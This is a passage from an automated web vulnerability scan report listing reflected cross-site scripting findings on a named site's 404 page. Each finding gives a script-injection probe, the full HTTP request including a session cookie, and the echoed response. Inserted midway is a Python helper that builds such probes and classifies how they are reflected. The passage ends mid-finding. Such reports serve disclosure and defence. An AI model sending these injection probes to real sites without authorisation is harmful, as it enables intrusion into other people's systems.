The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c93d9<script>alert(1)</script>b7a3e29635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpc93d9<script>alert(1)</script>b7a3e29635&ltr=K HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpc93d9<script>alert(1)</script>b7a3e29635&ltr=K was not found on this server.</p>
...[SNIP]...

2.4720. http://www.resellerbase.com/tags.php&ltr=K [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=K

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe13d<script>alert(1)</script>a85363680df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=K?fe13d<script>alert(1)</script>a85363680df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=K?fe13d<script>alert(1)</script>a85363680df=1 was not found on this server.</p>
...[SNIP]...

2.4721. http://www.resellerbase.com/tags.php&ltr=L [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=L

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a516<script>alert(1)</script>f7894c50d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php1a516<script>alert(1)</script>f7894c50d8&ltr=L HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php1a516<script>alert(1)</script>f7894c50d8&ltr=L was not found on this server.</p>
...[SNIP]...

2.4722. http://www.resellerbase.com/tags.php&ltr=L [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=L

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39347<script>alert(1)</script>deea2df5e35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=L?39347<script>alert(1)</script>deea2df5e35=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=L?39347<script>alert(1)</script>deea2df5e35=1 was not found on this server.</p>
...[SNIP]...

2.4723. http://www.resellerbase.com/tags.php&ltr=M [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=M

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae09c<script>alert(1)</script>643dff8ab8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpae09c<script>alert(1)</script>643dff8ab8f&ltr=M HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpae09c<script>alert(1)</script>643dff8ab8f&ltr=M was not found on this server.</p>
...[SNIP]...

2.4724. http://www.resellerbase.com/tags.php&ltr=M [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=M

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d16c6<script>alert(1)</script>ad2c5db412c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=M?d16c6<script>alert(1)</script>ad2c5db412c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=M?d16c6<script>alert(1)</script>ad2c5db412c=1 was not found on this server.</p>
...[SNIP]...

2.4725. http://www.resellerbase.com/tags.php&ltr=N [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=N

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87697<script>alert(1)</script>8d5e0d3d656 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php87697<script>alert(1)</script>8d5e0d3d656&ltr=N HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php87697<script>alert(1)</script>8d5e0d3d656&ltr=N was not found on this server.</p>
...[SNIP]...
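
The findings in this series share one sink: the 404 page echoes the request target verbatim. The following Python helper is an added example, not part of the XSS.CX report or of the resellerbase.com application. It rebuilds the two probe shapes the report uses (a suffix on the first path segment, and the name of an extra query parameter) and classifies how a response body reflects the canary, so a raw reflection can be told apart from an HTML-encoded or percent-encoded one. The function names and the sample bodies are the example's own; the bodies are constructed to mirror the 404 page shown above and the code runs offline.

```python
"""Triage helper for reflected-URL XSS findings like the tags.php 404 series.

Added example: not part of the original report or the target application.
It rebuilds the two probe shapes the report used (a suffix on the first path
segment, and the name of an extra query parameter) and classifies how a
response body reflects the canary, so that a raw reflection can be told apart
from an HTML-encoded or percent-encoded one. It runs offline: the sample
bodies below are constructed to mirror the report's 404 page.
"""
import html
import secrets


def make_canary(js: str = "alert(1)") -> str:
    """Random hex on both sides of the probe, as the scanner does, so that a
    hit in the body cannot be confused with pre-existing page content."""
    return f"{secrets.token_hex(3)}<script>{js}</script>{secrets.token_hex(5)}"


def build_probes(segment: str, suffix: str, canary: str) -> dict:
    """Return the two request targets used in the report.

    segment : first path segment, e.g. "/tags.php"
    suffix  : what follows it in the crawled link, e.g. "&ltr=N"
    'rest'  : canary appended to the path segment (REST URL parameter 1)
    'param' : canary used as the name of an arbitrary query parameter
    """
    return {
        "rest": f"{segment}{canary}{suffix}",
        "param": f"{segment}{suffix}?{canary}=1",
    }


def classify_reflection(body: str, canary: str) -> str:
    """Classify how the canary comes back in a response body.

    'raw'          : verbatim, tags intact; executes when rendered as HTML
    'html-encoded' : < and > came back as entities; safe in an HTML text context
    'url-encoded'  : came back as %3Cscript%3E...; not live as HTML, but retest
                     with the server-side decoded form of the path
    'absent'       : not reflected
    """
    if canary in body:
        return "raw"
    if html.escape(canary, quote=False) in body:
        return "html-encoded"
    percent = canary.replace("<", "%3C").replace(">", "%3E")
    if percent.lower() in body.lower():
        return "url-encoded"
    return "absent"


# Constructed sample bodies, modelled on the report's 404 page.
CANARY = "87697<script>alert(1)</script>8d5e0d3d656"
TARGET = build_probes("/tags.php", "&ltr=N", CANARY)["rest"]

VULNERABLE_404 = f"<p>The requested URL {TARGET} was not found on this server.</p>"
# The same page once the URL is passed through an HTML encoder before output.
FIXED_404 = f"<p>The requested URL {html.escape(TARGET)} was not found on this server.</p>"
# What a browser-sent link would produce if the page echoed the undecoded URI.
ENCODED_404 = VULNERABLE_404.replace("<script>", "%3Cscript%3E").replace("</script>", "%3C/script%3E")


def triage_samples() -> dict:
    """Classify the three constructed bodies; only the first is exploitable."""
    return {
        "vulnerable": classify_reflection(VULNERABLE_404, CANARY),
        "fixed": classify_reflection(FIXED_404, CANARY),
        "encoded": classify_reflection(ENCODED_404, CANARY),
    }


if __name__ == "__main__":
    for name, verdict in triage_samples().items():
        print(f"{name:>10}: {verdict}")
```

A "raw" verdict is what the report records. Before treating it as exploitable by a link, retest the "rest" probe from a browser: the browser percent-encodes < and > on the wire, so a victim can only reach the payload if the error handler echoes the decoded URI; if it echoes the raw request line you will see the "url-encoded" verdict instead, and exploitation needs a delivery path that sends those characters unencoded.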

2.4726. http://www.resellerbase.com/tags.php&ltr=N [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=N

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1a57<script>alert(1)</script>b68ea713393 was submitted as the name of an extra query parameter and echoed unmodified in the application's response.

As with the REST URL parameter variant above, the sink is the 404 page, which echoes the full request target, query string included, without HTML encoding; the parameter name is simply a place to put the payload without disturbing the rest of the URL, and the two findings have the same root cause and the same fix.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /tags.php&ltr=N?a1a57<script>alert(1)</script>b68ea713393=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=N?a1a57<script>alert(1)</script>b68ea713393=1 was not found on this server.</p>
...[SNIP]...

2.4727. http://www.resellerbase.com/tags.php&ltr=O [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=O

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5272<script>alert(1)</script>14965101489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa5272<script>alert(1)</script>14965101489&ltr=O HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa5272<script>alert(1)</script>14965101489&ltr=O was not found on this server.</p>
...[SNIP]...

2.4728. http://www.resellerbase.com/tags.php&ltr=O [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=O

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7624a<script>alert(1)</script>8a83e27d51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=O?7624a<script>alert(1)</script>8a83e27d51c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=O?7624a<script>alert(1)</script>8a83e27d51c=1 was not found on this server.</p>
...[SNIP]...

2.4729. http://www.resellerbase.com/tags.php&ltr=P [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=P

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2983<script>alert(1)</script>d8966e61d86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa2983<script>alert(1)</script>d8966e61d86&ltr=P HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa2983<script>alert(1)</script>d8966e61d86&ltr=P was not found on this server.</p>
...[SNIP]...

2.4730. http://www.resellerbase.com/tags.php&ltr=P [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=P

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cfeb<script>alert(1)</script>dc27487440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=P?4cfeb<script>alert(1)</script>dc27487440=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=P?4cfeb<script>alert(1)</script>dc27487440=1 was not found on this server.</p>
...[SNIP]...

2.4731. http://www.resellerbase.com/tags.php&ltr=Q [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=Q

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad6a1<script>alert(1)</script>62977986520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpad6a1<script>alert(1)</script>62977986520&ltr=Q HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpad6a1<script>alert(1)</script>62977986520&ltr=Q was not found on this server.</p>
...[SNIP]...

2.4732. http://www.resellerbase.com/tags.php&ltr=Q [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=Q

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cea83<script>alert(1)</script>ea4990b211b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=Q?cea83<script>alert(1)</script>ea4990b211b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=Q?cea83<script>alert(1)</script>ea4990b211b=1 was not found on this server.</p>
...[SNIP]...

2.4733. http://www.resellerbase.com/tags.php&ltr=R [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=R

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92d0e<script>alert(1)</script>1c7935ffb32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php92d0e<script>alert(1)</script>1c7935ffb32&ltr=R HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php92d0e<script>alert(1)</script>1c7935ffb32&ltr=R was not found on this server.</p>
...[SNIP]...

2.4734. http://www.resellerbase.com/tags.php&ltr=R [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=R

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57685<script>alert(1)</script>5ed3ec2c278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=R?57685<script>alert(1)</script>5ed3ec2c278=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=R?57685<script>alert(1)</script>5ed3ec2c278=1 was not found on this server.</p>
...[SNIP]...

2.4735. http://www.resellerbase.com/tags.php&ltr=S [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=S

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f005<script>alert(1)</script>d3752564a83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php9f005<script>alert(1)</script>d3752564a83&ltr=S HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php9f005<script>alert(1)</script>d3752564a83&ltr=S was not found on this server.</p>
...[SNIP]...

2.4736. http://www.resellerbase.com/tags.php&ltr=S [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=S

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d2760<script>alert(1)</script>e6daf3e9bb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=S?d2760<script>alert(1)</script>e6daf3e9bb9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

